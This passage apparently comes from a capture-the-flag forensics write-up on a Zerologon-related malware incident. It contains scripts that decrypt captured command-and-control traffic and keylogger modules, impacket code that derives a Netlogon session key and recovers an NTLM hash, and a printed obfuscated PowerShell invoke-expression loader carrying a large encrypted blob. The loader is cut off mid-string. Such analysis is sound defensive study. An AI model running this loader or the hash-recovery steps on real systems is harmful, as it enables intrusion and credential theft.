NgBmAGYAYwA0AGMAMgA4ADQAOQA3ADgAZgA0ADcANAA4ADIAMwA1ADcAZQAzAGEAOQA1ADYAZgAxADIANQA0ADMAMAA2AGIAMQA0AGYANgAwAGYANABkADMANwBhADUANgA3AGEAMAAyADkANAA4ADEAZQA0AGYAOAA4ADEANgAyADEAZABiADgAOABlAGQANAA2AGEAYwBlADMAOAA1ADUANgAzAGEAMwA5AGEAMAA5ADMAZAA2ADAANwBjAGMAZQA3AGIAOAAxADUAYQAwAGYAOAA0ADEAZQBjADMAOQAwAGIANQA5AGMAYwAxADQAMwBlADQAZABlADkAZAAwAGEAMgA3ADkANgBiADQAYgBjADAAYgBlADEAMwBjADIAOABiAGYAMQA4ADIANABiADMAZQBkAGIAMABkAGQAZABiAGQANgAwAGQAOAA0ADEANwBhADgAMgA2AGIAZABhADYAOQAwADQANwAzADUAZgA4ADEAMQBlAGYANgAxADEAZQA2AGMAMAA3ADUAZgA5ADQANABmAGMANQAzAGYAMAA2ADEAZQBiAGYANwA1ADkAZAAxAGUAYwA2ADkANABkAGEAMgBhAGUANwAwADcANAAzADAAOQBmAGIAYgBkADUAZABkADEANgA1ADEAOQA0AGQAYgA4ADgAMwBmADQAOQBiADgAMgBiAGEANABhADMAOQBkAGYAMgBkADQANAAxADkAYQA5AGEAMgAzADcANwA0ADQAZAAwAGUANABlADYAYgBlADMANABhAGIAZQA4ADMAOQA4ADMAYgA4ADkANQAyAGUAMABjADkAOAAwADMAYgAwADEAYgA1ADYANwBjADcAZABiADQAOAAxADgAOAA4AGMAYQA3AGMAOQA1AGUANAA4ADEANgBiADcAOQBkADMAMgA3ADIANAA2ADUAZQAzADcAZgBkADAAZQA3AGUANgBmADMANQAyADEAZABiAGMANwA5ADIAZABlAGYANQAyADIAYwA3ADQAYgA4ADUAMAAzAGUANABlADAAOQAyADIAZAAwADUAZQBmADcAZABhADIAZgA4ADAANgBhADgANgAwADYANwBhADUAMQBkADQAZQAzAGIAYgAxADYANgA3ADQAYQAwADAAMQBhADMANgBkAGIAYgA1AGMAMABhAGIAYgAwADcAZgBiADIAZQBmADgANAA5ADEAZAAwADAAYQA5AGUAMQA0ADEANwBmADUAMABkADAANwAxADIAOQAxADYAYwBjAGYAZgAxADcAYwA3AGMAMABjAGEANgBjADUAOAA0ADYAOQBkAGMAYQBmADQAZABlADYAMQBkADIAOQA1AGQANwAyAGYAYwBkADYAZgAwADMAZgBhADIANQBlAGEANQBiADYANAAxADgANQAyADIANAA0ADQAYwAxADMANQAyADkAOQAzADcAZQAzADcANgAwADQAYQA0AGEAYwA0ADIAOABhAGQAOQBiADUAYQBhADgAOAAxADYAYQBiAGMANwA4ADMANwBkAGQAMABkAGQAYwA5ADAAOQAyAGQAZQA5AGUAZQBiAGIAMgAxADIAZABkAGEANwA4ADQAZQBlADQAZAA5ADUAZAA3AGQAYgA3ADUANgBjADgANAA2ADgAZgA1ADQAMgA1ADkAMQA0ADEAYgBjADAAZAAzADAANwAzAGIAYwBhADAANgAyADcAMAA3ADUANQA3ADQAYQAzADEANQAwADIAMgAwADAAOAAzAGMAOAA1AGEAMAAzADEANQAzADMANAA4ADMAMgA4AGYAOQAzADQAOAA5ADYANgBjADIAMQAwAGQAOAA1AGIANgAzAGEAZAA0ADYAMQA3AGMAZQA3ADkAZABmADUANwA0ADIAYwBmADgANgA4AGIAMAA1AGEAMgA3ADcANQBiADEAYQA1ADAANABmADkAZgA1ADcANQA3AGUANgA1ADkAMQAzAGIANABmADYAOQAwADIAZAA3AGQANgA0AGMAZQBjAGIAOQA0ADYAZgBlAGQAOQAwADYAZAA0AGQAOQBmADMANAAyADMAOQBlAGUAMQAwADEAYgBjADMAOABiAGYAYgBjAGIAMABjADEAZQAyADMAYgBjADUAZAA1ADYAMAA5ADcANAAzADIAYgBkAGYAYQA0AGEANgBkADcANgAyAGUAMwA1AGYANgAwADgAYQBiADYAMgBmADgANwBmADMAOABkAGEANABkADAAYgBhADYAYgBjAGEAOAA3ADkAMAA4ADQAOAAwAGQANQA2ADUAZgAyADMAMQBkAGUAMQAwADMAZABkAGYAOABiAGEAYgAxADgAOQA0ADcAMwAwADgAOQA3AGYAMgAzADAAMABlADUAZQAwADYAOAAwAGIAYwA1AGUAZQBjAGUAYgAwADUANQBmADgAMAA2AGYANQBhADIAYQBmADcAYQAxADgAZgAxADEAZQA2AGEANwBjADUANQBmADAAYgBlADAAZgBiADcAOQA2ADgAYwA3ADIAZgA5ADYANwA3AGEAMwBkADUAMgBlAGQAYgA0AGIAZQA4AGUAMwA5ADIAYQA1ADAAYwA5ADQANwAxAGMANwA2ADMANABjADEAZAA4ADUAMAA4AGYAYgA2AGMANQAwADEANQBiADkAYwAyADgAYwBiADYAMQBiADgAYgA3ADkAOQA0ADIAYQBlADEAMQBlADYANwA1ADEAOAA4ADUAYgAxAGUAYwBiAGEANwBlADYAZQAxAGEAZgBiADUANgA3AGEAYQA1ADQANAA1ADgANABlADQANAA5ADYAMgBlADQAZAA5ADgAOAAyADcANAAxAGMAZABiADEAZAA1ADgAZgBkAGEAMgBlADkAZQBhAGMANQA4ADAAYgA0AGMANAAyADgAMgAyAGEAZQA3ADgAOQBlADEANwBlADEAMgBhADEAYQA3AGYAZQBhAGUANwBmADkAZgA1ADUAZAAxADQAZQAwAGIANQA3AGYAZgA5ADEAZQA5AGQANQAzAGIAZQBiADAAOQBiADYANABmADAAOQBkADIANABkAGQANwAzADIAZQBlADEAOQBiADUAZQA0AGQAMABkAGIAYQBiADgAOQBkADkAMQA1ADgAOQAwADQAYgA3ADQAYQA0AGYAMwA1ADEAMAA1AGMAZgAxADIANgBjADYAMwAzAGIANQAzAGYANwA2AGQAYwA5AGQANgBkADkAOQBkADgAMgBmADMAOQA5ADQAZgBiADEANAA5ADYAMwBkADkAYgBjAGEAMQA3AGEAYgAwAGYAMAAxADAANwBiADkAMQAzADYAMgBjADQAMgBmAGUANAAwADEAYwA4ADgAMQA5AGQAMABhAGQANQBiAGUAMwA2ADYAOQA3ADYANABhAGQAYgAwAGEAZgA5ADUAYQAxADUAZAA5ADYAZQAwADgANwA2ADkAYgBmADAANwA5ADYAOQAxADQAZgA0AGQANQBkAGIAZAAxADMAYQA3ADUAMAAxADAANwAzADAANgBlADMAMgAxADMAMQBmAGYAOAA2ADQAOAAwAGMAMQBmADgANgAxADgANQBhADYAOQBjADIANABhAGUAMABkAGUANgAyADMAZABlAGEANgBiAGYAMABlAGEAMAAxADUANQA4AGYANABjADYAZABjAGIAMgA5ADcAZAA0AGUAMQA5ADMAMgA3ADUAZgAyAGEAZAAxADkANAAyAGIAZABkAGMAZQA4ADcANQA5ADcAMwBhADAAZAA2AGIAMQAyAGEAZAA4ADAAYwAxAGMAMgA2AGIAZgA4ADEANQA0ADgAOQBkAGYAZAA2ADQAOABiAGQAYQAwAGYAZgA5AGIAMgAwADQAYQAyAGYAZAA5ADgAOQA1AGQAMgAxADEAYgBiAGMAMgAyADcANABjADQAMgA1AGUAYQBjAGYAZgAyADAAMwAxAGQAOABjAGQAYQAwADYANQA5AGUAMgA4ADYAOQBhADUAZAA1AGUAOQA2ADIAZQAzADgAMgAwADAAOQBkADkAZAAwADcAZgA0AGMAYgA5ADQANwA5AGUAYwBhADUANgBlADMAZgA5ADQAZAAzADgAZgA4AGMAMwA4AGMAOQA0ADYAZAA1ADgAMQBiADgAZQBiADAAYwBhAGEAZAA0ADAAMgA2ADQAMwBiAGUANwAxADUAYwA1ADMAZABhAGQANgA2ADIAYgBkAGIAYwBkAGYAYQBjADcAOQBjADUAMgA3AGMAMwA1ADAANAA3ADQAYgA0ADMAZAA1AGQAZQAzADEANQA2ADcANwA1AGEAZABhADYANgBkADAAMwA3ADcAZgBlAGEAZABlADkANAA4ADQAYwAwADkAMAAyADMANgBmAGUAYwBlAGIAYQAwADkAYQBjAGUAMgBlADcAZgBkAGIAMgBmADUAMgBmADUAYQA1ADcAMQAzADIAMwBmAGYAYwBkADEAMwAxAGYAMwA1ADIANABkADgANAA3AGEAYwBkADMAMQAxAGYANgA3ADUANgBlAGEANgAyADAAZQBhADcAYwBkADUANgBlAGUAMQA3ADcAMABmADUAMgBjADQAYQBkADMAMwBlADIANABkAGQANAAyADAAMwA2ADkAMAA4ADUAMwAyADcAMQAwADIAMQAzAGMAZAA4AGUAYQBiADMAMQAzADQAMwA1AGEANAA4AGYAZQBlADIAOAAyADMAZgAwADEANgBkADAAYQA4AGYAMgBiADgANgBmAGQANAAzADMANQA0ADcAZgBkADkAOAAxADQANgA4AGMANwA1ADAAOQBiADMAYQAxADMANQAxAGEAOABjAGYAYgA4ADEAMAA3AGYANQAzADkANwBmADcAMwA5AGYAMgA2AGQANABlADgAZgA3AGUAMABiADYAYQBkADAAYwBjADcANAAyADEANgAyADMAYwAxADIANQA2AGQAMgA2AGYANwA0ADUAZgA4ADYAZAAwADQAMAAxADAAYgA1ADEAMAAwAGYAOQBhADAAMQBkADkAZABiADYANABjADEAOQBiAGYAYgBlADUANwBmAGMANQA3AGUAZgBiAGEANgA5AGEAMwBhADQANgA5ADAANgAyADUAMAAyAGUAZgA3ADQANwA2ADcAMAAyADUANgA2ADUANAA4ADgAYgBiADkANAA0AGYAZQBlADgANQBhADAAYgBhAGIAYQA4ADAAMwAxADQAYgBkADkAZABkAGUAMQAzADUAMQBkAGUANgBhAGEAZQBlAGUAYgBlADcAYQAyAGMAYQA3ADAANgA3AGMAMQA3ADgAYwA0ADQAMQAzAGEAZABhADIAZAA5AGEAYQBiADcAZgAyAGMANQAwAGUAZQBlADkAMQBmAGUAYwAyADEANQAwADkANAA1ADgAOABmADcAMQA0ADQAYwA5ADkAZABmAGYANAA5ADQAYwA5ADcAYgAxAGYAOQA3AGIAMwBhAGYANwA5ADMAMgAxADIAYQBjADYAMQAxAGMANAAyADYANwA3ADkAMQBiAGUAYQA3AGIAMQAxAGUAMAAyAGQAMgAwADUAZABkADIAYQBhADgANgBmADEAOAA1AGIAOQA0AGMAYwBlADYAMABmADAAZQAzADMAMQAyADYANwAzADYAYwBmAGQAYwBmAGQANwBjAGYAZQBmADYANwA3AGEAZgA4ADgANgA3ADcANQBiADQANQA4ADEAMwA5ADAAOQA0ADMAZQAxADUAZAA4AGYAYgA0ADYANgAwAGIAMAAxADIAZQBlADIAMQA3ADkANQA2ADUAZgBmAGUANwAxADcAYwBmADcAOAA3ADcANwBiAGYAMQBjADUAMAA2ADUANAA2ADcAOAA0ADkANwAzADgAYQBmAGUAZAAyADgAYwAwAGQAOAAzADMAMQA2AGUAMwA4AGQAMgBiADYAYwAwADgAOQA0ADYAZgBjADcAMwBjADUAMgA2AGQAOQAwADIAZQAxAGQAMABiADgAMgBjADMANwA1ADUAYwAyADYAMgBmADMAMwA4AGEAOQAwADAAMwA5ADAAMwAyADkAMAA1ADAANQBiADgAYwBjADYAMABjAGIAMQAwAGIAOABiAGMAMAAzADEAYQBjADIAMQA1AGUAMAA0ADQAYQAxADAAMAA5ADMAYgBlAGQAMwBiAGQAMABjADEAZABmADMAMAA2ADMAOAA3AGEAZQA5ADMANwBkAGEAYQA2AGQAMAAzADIAOABjADMANwAzADgAZABlADUAYQAxADMAZgBkAGIAOAA3ADYANAA3ADYAZABkAGUANQA1ADgAYwBjADEAMAA0AGEANgA0ADMAYgBhADgANgAzADUAZAA4ADMANgA3ADIAZABjAGIAZQAzAGYAMgBkADkAMgBjADgANABkADYANwA5AGUANgA1AGQAMwA5ADcAOAAzAGUAOQBmAGUAYwBiAGUAZAA2AGEAMwAwADcAMAA5AGMAYgAxADMAYgA0ADQANwAzADYANQAwAGIANwA2ADIAMwAxADIANgBlADEAZABkADUAZQBjADMAMgBmADIANAA5ADgANwBhADAANAAyADcAOABhAGUAZQBiADgANwBiADkANwA5AGUAZQA0AGEANQA0ADAAOQAxADYAZgAyADYANQBjADAAMQA1AGEANABiAGYAYQAyAGIAMwA5ADEAZQBmAGQANQA5AGYAYQA2AGEAYwAxADMAOQBhADgANwAwAGYAMgAxADcAMgAwADAAOAA3ADMAMwA4ADAANgA1AGQAYQBlADUANgA3AGEANgA0ADAANgA2ADIAZgAwAGUAMAAyADUAOAA1ADcANAAxADMAMQA5AGMAYwA5ADAAOQAzAGIAOQA4ADIAMAA4ADIAYgBkADkAYwBmAGIAZgA4AGMAOABiADcANgBjAGYAZQBkAGEAZQBlADkAOAA0ADEAMgBlAGUAMABmADUAMQA0ADYAYQA4ADMAMQAyADMANwAzADQAOAAwAGQAZABlADQAZQAxADkANABmADUAZABlADUAYgAzADUAMQA2ADMAOAA4ADYAYQBjAGIANwBmAGMANwAwADgANABkAGQAYgA1ADYAOABkADgAOQAyADkAMgA0ADkANwA2ADgAMwBhADcAZABmADEAMwBlAGUAYwAyADEAZQBiADcAZQAxAGYAYwBlADcAYwBlADIAOAAyADUAOQBjADQANwBmADIAYwBjADkAYgA2ADcAYwAyAGMAMgA4ADUANwAyADkAYgA1ADEAMQAyADAANQA0ADIAYwA1ADAANwAxADcANAA4AGEAMgA5ADUAMQA1AGMAMwAyAGQAZQA1ADEAMgAyADEANQBiADkAZAA1AGYAYwA4ADMAMAA0ADkANQA3ADQAMAAyAGUAMABiADIANgBmADcAOABkAGUAMgAwAGYAOQAxADIAMgA0ADMAMgAyAGYAMQAxADcAZgAwADEAZAA0ADYANABhAGYAOAA0AGMANAAwAGMAMAA0ADQANQA2ADcAYwA4ADMAOQA1ADMAMABmADQAYQA2ADkAYwAxADkAMQBhADcAOQBjADAAMwBmAGYAOQAxAGEANQAxADYANwA1ADQAYQAxAGEAMwAzADgAYQA1ADcANgA5ADkAMAAxAGUAOQAxADEAZgBlAGYAZAAxAGIAZQAzADgAZAAxAGUAOABmADQAZQA4AGIAZAA1AGIAOQA4ADYAMgBiAGEAOABiAGYAYwAyADEANQAzAGUAYQA1ADMAYgBmADkANQBhADMAYQA1ADQANgA4ADMANQBkADcANAA2ADAAZgAwADUAYwBkADUAOQA4AGIAZAA2ADkANAAxAGEAYgBlAGMAOQBmAGEAZgA2AGYAMgA1ADkAZQA3AGYAYgBiAGMAOQA3ADYAMwAyAGMANwAzAGYAZAA5ADgANwBkADMANgAwADkANwA1AGYAZAA3ADkAMgAwADUAYgA1AGYANAA0AGQAZgAxADIAYgAyADMAMQBkADEANAAyADQAZQA4ADQAMwA0AGEAZgAwADcAMgBiADAAZQBkAGQANgAyAGUAZgAwAGUAZABjAGIAZgA4AGIAMAA5ADEAMQAxAGQAYwBlADMANwA5ADgAZAA2ADIAMgA0ADEAZQA2AGMAYgBmADQANgBlADkAYwBmADkANABjADcAOAA5AGIAYwBjADYANwBlADYAYwA3AGQANwA3AGIAZAAxADgAOQBiAGQANgA0ADMANgA5AGMAMgA3ADgAYQA0ADgAYgBjADcAMwA2AGEAYQBhADUAYQA0AGMANABmADQAMwBkADUAZQA3AGMAMQBkADEAMgAxAGEAMAA1AGUANQBlADIAYwA1ADkAOAAyADIANgA1AGYAMwBjADcAZQAyAGEAYgA0ADYAYQBhADMANgBhADgAMQAwADUAZgBhAGMAMgBiADkAOABmADEAYQA2ADgAYgA2AGEAOQBkADIAYwAyADMAZAAzADkAOQA4AGQANwAxAGUAZgA0ADcANwBkAGMAOQA0ADUAZQA3ADAAYgAyAGEAMwAzAGUAOQBjADcAZQA2ADIAZgA4ADkAOQAwAGIAZABkAGMAMwA5AGMAMQBhADkAMwAwAGYAMwBjAGQAMgA3ADcAYQA0ADMAOAAzAGQAYwA2ADEAOAA0ADUANABmAGQAMwBkADYAZQAxAGQANQAwADgANQA3ADkAZgBiADgAOAAyADkAYgBlAGMAYwBiADQAMQAyADEANgBmADcAZAAzADUANgA4AGMAZgA4ADAANwA5AGYAOQBkADMANABkADYANQAwADAAMgBjADcAYwA3AGYAZQA5ADMAMQBkADUAZABhADQANAA3ADgAYwBkADQANgA4ADUAZQA1ADAAMAAwADcANwBhADcAYQA5AGMANgA5ADcAYQA5ADAANQA5ADQAOQA2AGQAZQBlADUAYgA5ADUAMwAxAGEAMwAyADkAZQBjADkAZAAwADcAZQBmADAAMgBhADYANQBmADkANAAzAGQAZAA0ADMANQAwADUAMgBjADUAMABjAGMANgAxADUAMwBhADkAYwA3ADEAMQBjADMAOQA0ADEAZQA1AGEAZQA4AA=='
# Write-Host "Encrypted:`n$encrypted`n"
 
# create new object using $encrypted and $aeskey
$secureObject = ConvertTo-SecureString -String $encrypted -Key $aesKey
 
# perform decryption from secure object
$decrypted = [System.Runtime.InteropServices.Marshal]::SecureStringToBSTR($secureObject)
$decrypted = [System.Runtime.InteropServices.Marshal]::PtrToStringAuto($decrypted)
$decrypted

4. Decode xor

$k = 27, 39, 49, 66, 40, 44, 74, 95, 95, 30, 43, 48, 114, 39, 49, 76, 74, 72, 30, 29, 28, 114, 27, 28;


for $i=0; $i -lt $k.Length; $i++ {
        $k[$i] = $k[$i] -bxor $host_[$i % $host_.Length];
}

$tmp = [System.IO.Path]::GetTempPath;

[string] $name = [System.Guid]::NewGuid;

$tmp += $name;

[System.IO.File]::WriteAllBytes$tmp,[Byte[]]$k;
# Zerologon_is_crazy______
Malware

1. Export data

client_recv = open("10_100.bin", "rb").read()
client_send = open("100_10.bin", "rb").read()

recv = client_recv.split(b"CSCN")
send = client_send.split(b"CSCN")

# print (recv)
print (len(recv))
print (len(send))

for i in range(len(send)):
    name = "module/recv_" + str(i)
    open(name, "wb").write(b'CSCN' + recv[i])

    name = "module/send_" + str(i)
    open(name, "wb").write(b'CSCN' + send[i])
2. Decrypt Data

from Crypto.Cipher import AES, ARC4
import os

for i in range(1, 33):
    name = "send_" + str(i)
    data = open(name, "rb").read()
    key = data[9:0x19]

    if ord(data[8]) == 0:
        out = "_" + str(i)
        enc = data[0x1d:]
        open(out, "wb").write(''.join(chr(ord(enc[i]) ^ ord(key[i%16])) for i in range(len(enc))))

    if ord(data[8]) == 1:
        rc4 = ARC4.new(key)
        out = "_" + str(i)
        open(out, "wb").write(rc4.decrypt(data[0x1d:]))
    
    if ord(data[8]) == 2:
        aes = AES.new(key, AES.MODE_ECB)
        out = "_" + str(i)
        open(out, "wb").write(aes.decrypt(data[0x1d:]))

    if ord(data[8]) == 4:
        out = "_" + str(i)
        open(out, "wb").write(data)

# call hook keylogger --> (1->i) (4->a) (0->o)
3. Decrypt Rice and Serpent

import os 

for i in range(1, 33):
    name = "_" + str(i)
    data = open(name, "rb").read()
    
    if i == 3 or i == 14 or i == 30 or i == 31:
        out = name + '.b'
        open(out, "wb").write(data)
        os.system("serpent.exe " + out + " " + out + 'i')
        os.system("alg.exe " + out  + "i " + out + 'in')
    else:
        out = name + '.b'
        open(out, "wb").write(data[4:])
        os.system("alg.exe " + out + " " + out + 'in')

  
## chall1.py
from impacket.dcerpc.v5 import nrpc, epm
from impacket.dcerpc.v5.dtypes import NULL
from impacket.dcerpc.v5 import transport
from impacket import crypto
from impacket.dcerpc.v5.ndr import NDRCALL
import impacket

from binascii import hexlify, unhexlify
from Cryptodome.Cipher import DES, AES, ARC4
from binascii import hexlify, unhexlify


serverChallenge = b'fe216509397c0893'
sessionKey = nrpc.ComputeSessionKeyAES(None,b'\x00'*8, unhexlify(serverChallenge), unhexlify("31d6cfe0d16ae931b73c59d7e0c089c0"))
print("session key: ", hexlify(sessionKey).decode())

enc = b'97357430f9fee6fb3b32bdea7a3b206d'
pwdata = impacket.crypto.SamDecryptNTLMHash(unhexlify(enc), sessionKey)
print ("pwdata: " + hexlify(pwdata).decode())
# 24631463edc7d6a03657f1ea0f3cff7b

## decode_base64.ps1
.( $sHeLLiD[1]+$sHELliD[13]+'x')(( neW-oBJECt ManagemEnt.AuTOmaTiOn.PSCREdENTIal ' ',( '76492d1116743f0423413b16050a5345MgB8AG0AZwBMAHQASQAzADAAQgBOAGEAQwBMADcAVABRAFgAZABFAFUAWgBqAFEAPQA9AHwAYgAwAGYAYwA4AGEAMABlADUAMgA2ADQAMAA5ADAAYQBlAGMAYgAyAGIAOAA3AGMAOABlAGMAMgAxADkAOQBhADIAZAA0AGIAZAA5AGEANwA2AGUAMwA3ADkAZAA0ADUAMgAzADQAZAAwAGQAYQBiADYAOABmAGEAYQAxADgAZABmAGEAMgA2ADQAYwBkADAAYwA1ADIANQA1ADQAZgAwADIAOQAwAGMAZQAyADMANwBiADgAMQA5ADEAOQA3AGUANgA1ADkAMgBmAGEAMwBmAGMAMQBmADkAMwAzADQAZgBiADkAMgBiADYANwA5ADUAOQA0ADQAZQBkADMAYwA3ADQANAAwADAAZgA4AGIANgAwADIAYQBkADEAMgA3ADIAYwBiAGIAZAAwADUANwA1ADgANgBiADgAMgAyADIAMAAwAGYAMQA2AGQAOAAxADAANQAzAGUANgA1ADMANQBjADYAOQA4ADEAMwAyADgAOAA0ADkAMAA0AGEAYQAwAGMAMgBlADYAMQBkADAAMgBkADUANgBmAGIAYwBjAGQANQAxADYAOABlADkAYgA2ADEAYgBjAGQAMQA0ADQAMgA4ADAANQBlADkAMwA5AGUAOQAzADAAYQA3AGYAZAAwAGEANQBmADcANABhAGEAYgA2AGYAYwA4ADEAZABjAGEAMwBmAGMANwBkAGQAMwAzADYAZQBiADIAZQBlADUAOQAzAGIAYwA3ADAANQBiADEAZABiADUAZQAyAGIAZQBmADAAMQA3AGEAZQBhADAAYwA0AGIAZABjAGUAOQBlADcANQBiADgAZgBhAGQANABmADAANwBiAGYANABiAGQAZgAyADMAYQAxADEAYgA1ADgAZgAzADcAOAAxAGUAYgAzAGUAMgAwAGYANgA1ADIAMgAyAGUAZgBkADAAZAA2ADUAMABhADgAZgBjAGIANQA2AGMAMgA1ADcAMQBjADkAYwBiADkANABiADkANQA1ADIAZAAxADIAZAA5ADEAMwBlADIAYwAyADkANwAwAGUANAA0ADAAOAAwADMANQBlAGUANAAxADUAZABmADUAZgBhADMANAA4ADkAZgBjADQAMwA0ADAAOQA2ADAANgAxADIAZQBlAGMAOQA2ADIAOQA0ADgANQA0ADMANwA1ADAAYwA1ADYAOQBmADEAZABiAGYAMQA4AGUANAA4AGMAMQA5ADAAZAA2ADUAYgAyADgANgA3AGYAYgBjADcAZgAyADMAYwA2AGUAYwA3AGUAZQBmADgAMwAzAGMAMgA2ADkAZQAxAGEAMAA1ADkAMgBkADEANgAyAGIAMAA4AGIAOAA5ADIAMQBiAGEANABiADEAOABjAGQAZgBmAGYAYQAwAGYAMwBmAGMAMQAwADUAZgBiAGYANABlADQAZgBmADcAOABjAGUANwA2AGEAMwA1ADAAZgAwAGQAYgA1ADQAMQA4AGYAYQA3AGEAZQA0ADYAYgAyAGUAZQA0ADgANAA0ADkAMQA5ADkANAAyAGQAYQBhADAAZAA4ADYAZQA5AGMAMgA0AGYAZgA4AGEANwAwADgANQA2AGUAOQBkADEAZgA2ADQANgAzAGQAZgAwADUAYwA3ADIAMABjADcAYwBlADMAOQAyADIAZQBhAGQAYQBlAGQAMgA0AGIAMgBlAGQAOQBiADUAMAA4AGYANQA4ADAAZQA5ADUAMgBmAGEAMgAyADkAMwA2AGIAMQAyADYANwA3ADUAOABmAGEAZQA1ADkANQA2ADIAOAAxADgAMQA4ADYAMgAyADQAOAAxAGUAZAAwADMAYgA4ADkAZQA5ADgAMgA1AGYAMgBmAGIANwAyAGYAZgAyAGEANwA5AGMAMwA5AGYAZAAyADUAMwA1ADAAZgAwAGEAYgBlADkAMABlAGIAOAA0AGQAZAA5ADMAMgA0ADEAMQA1AGUAMAA0ADEAMgAyADgAYQA0ADMAZAA3ADAAYwA1AGUAOQBmADQAYQBhADMANQBhADYAOAAxADAAZQA1ADkAOABmADMAMABkAGEAYQBlADAANQAyADUAYQA0AGYAOABkAGMAYwBhAGIAMABjADEAYgAzADkANAAzADMAYwA3AGQAZQA4AGUAYgA5ADEAMABkADIAOQBiADEAYQA1ADkAZAA1AGUAMwA3AGUAOQAyAGUAMQBmADEAOQBkAGUAMAA2AGEAZQAxADkAYQA4ADgANAAzADcANQAyADUAOQA2AGIAOQAxADYANwA3ADQAMQBlAGQAOAA4ADAAOQA0ADUAYgBmADUAOQA2ADgAYwBhAGUAOQAzADMANwA1ADkAZgAyADQAZAA1AGYAZABmAGIAZQBlAGMAMQAxADcAYQA4ADYAMwBjAGEANgA3ADEAMgA3ADYAZgA4AGMAMQBhAGEAZAA2AGEAYQBjADAAMgAwADAAYQA4ADUAOAA3AGQAMwA0ADQAOABmAGEAZgBkADMANABhADYAMQBiADIAMwA1AGUAOAA5ADQANgBlADAANQA2AGIAZABmADQAMQAwADgAMgBiADUAMgBhADUAYQBlADEAYwAzADIAMwA0AGUAOQA5ADMAZQAwADAANwA5ADkAZAA3AGUANwAyADQAOQAzAGQAMwA3ADMANwA3AGYAYwBiAGIANAA4ADcAOQA1AGIANQAxAGMAYwA0ADEAYQBkAGYANQAxAGEANAA2AGEAYwA2AGQAMABhAGIANwBhAGIAZQA1ADYAMQBkAGQAMgBlADMAZgA1AGEAMgBkAGEANgBmAGYAYwA0AGMAMgA4ADQAOQA3ADgAZgA0ADcANAA4ADIAMwA1ADcAZQAzAGEAOQA1ADYAZgAxADIANQA0ADMAMAA2AGIAMQA0AGYANgAwAGYANABkADMANwBhADUANgA3AGEAMAAyADkANAA4ADEAZQA0AGYAOAA4ADEANgAyADEAZABiADgAOABlAGQANAA2AGEAYwBlADMAOAA1ADUANgAzAGEAMwA5AGEAMAA5ADMAZAA2ADAANwBjAGMAZQA3AGIAOAAxADUAYQAwAGYAOAA0ADEAZQBjADMAOQAwAGIANQA5AGMAYwAxADQAMwBlADQAZABlADkAZAAwAGEAMgA3ADkANgBiADQAYgBjADAAYgBlADEAMwBjADIAOABiAGYAMQA4ADIANABiADMAZQBkAGIAMABkAGQAZABiAGQANgAwAGQAOAA0ADEANwBhADgAMgA2AGIAZABhADYAOQAwADQANwAzADUAZgA4ADEAMQBlAGYANgAxADEAZQA2AGMAMAA3ADUAZgA5ADQANABmAGMANQAzAGYAMAA2ADEAZQBiAGYANwA1ADkAZAAxAGUAYwA2ADkANABkAGEAMgBhAGUANwAwADcANAAzADAAOQBmAGIAYgBkADUAZABkADEANgA1ADEAOQA0AGQAYgA4ADgAMwBmADQAOQBiADgAMgBiAGEANABhADMAOQBkAGYAMgBkADQANAAxADkAYQA5AGEAMgAzADcANwA0ADQAZAAwAGUANABlADYAYgBlADMANABhAGIAZQA4ADMAOQA4ADMAYgA4ADkANQAyAGUAMABjADkAOAAwADMAYgAwADEAYgA1ADYANwBjADcAZABiADQAOAAxADgAOAA4AGMAYQA3AGMAOQA1AGUANAA4ADEANgBiADcAOQBkADMAMgA3ADIANAA2ADUAZQAzADcAZgBkADAAZQA3AGUANgBmADMANQAyADEAZABiAGMANwA5ADIAZABlAGYANQAyADIAYwA3ADQAYgA4ADUAMAAzAGUANABlADAAOQAyADIAZAAwADUAZQBmADcAZABhADIAZgA4ADAANgBhADgANgAwADYANwBhADUAMQBkADQAZQAzAGIAYgAxADYANgA3ADQAYQAwADAAMQBhADMANgBkAGIAYgA1AGMAMABhAGIAYgAwADcAZgBiADIAZQBmADgANAA5ADEAZAAwADAAYQA5AGUAMQA0ADEANwBmADUAMABkADAANwAxADIAOQAxADYAYwBjAGYAZgAxADcAYwA3AGMAMABjAGEANgBjADUAOAA0ADYAOQBkAGMAYQBmADQAZABlADYAMQBkADIAOQA1AGQANwAyAGYAYwBkADYAZgAwADMAZgBhADIANQBlAGEANQBiADYANAAxADgANQAyADIANAA0ADQAYwAxADMANQAyADkAOQAzADcAZQAzADcANgAwADQAYQA0AGEAYwA0ADIAOABhAGQAOQBiADUAYQBhADgAOAAxADYAYQBiAGMANwA4ADMANwBkAGQAMABkAGQAYwA5ADAAOQAyAGQAZQA5AGUAZQBiAGIAMgAxADIAZABkAGEANwA4ADQAZQBlADQAZAA5ADUAZAA3AGQAYgA3ADUANgBjADgANAA2ADgAZgA1ADQAMgA1ADkAMQA0ADEAYgBjADAAZAAzADAANwAzAGIAYwBhADAANgAyADcAMAA3ADUANQA3ADQAYQAzADEANQAwADIAMgAwADAAOAAzAGMAOAA1AGEAMAAzADEANQAzADMANAA4ADMAMgA4AGYAOQAzADQAOAA5ADYANgBjADIAMQAwAGQAOAA1AGIANgAzAGEAZAA0ADYAMQA3AGMAZQA3ADkAZABmADUANwA0ADIAYwBmADgANgA4AGIAMAA1AGEAMgA3ADcANQBiADEAYQA1ADAANABmADkAZgA1ADcANQA3AGUANgA1ADkAMQAzAGIANABmADYAOQAwADIAZAA3AGQANgA0AGMAZQBjAGIAOQA0ADYAZgBlAGQAOQAwADYAZAA0AGQAOQBmADMANAAyADMAOQBlAGUAMQAwADEAYgBjADMAOABiAGYAYgBjAGIAMABjADEAZQAyADMAYgBjADUAZAA1ADYAMAA5ADcANAAzADIAYgBkAGYAYQA0AGEANgBkADcANgAyAGUAMwA1AGYANgAwADgAYQBiADYAMgBmADgANwBmADMAOABkAGEANABkADAAYgBhADYAYgBjAGEAOAA3ADkAMAA4ADQAOAAwAGQANQA2ADUAZgAyADMAMQBkAGUAMQAwADMAZABkAGYAOABiAGEAYgAxADgAOQA0ADcAMwAwADgAOQA3AGYAMgAzADAAMABlADUAZQAwADYAOAAwAGIAYwA1AGUAZQBjAGUAYgAwADUANQBmADgAMAA2AGYANQBhADIAYQBmADcAYQAxADgAZgAxADEAZQA2AGEANwBjADUANQBmADAAYgBlADAAZgBiADcAOQA2ADgAYwA3ADIAZgA5ADYANwA3AGEAMwBkADUAMgBlAGQAYgA0AGIAZQA4AGUAMwA5ADIAYQA1ADAAYwA5ADQANwAxAGMANwA2ADMANABjADEAZAA4ADUAMAA4AGYAYgA2AGMANQAwADEANQBiADkAYwAyADgAYwBiADYAMQBiADgAYgA3ADkAOQA0ADIAYQBlADEAMQBlADYANwA1ADEAO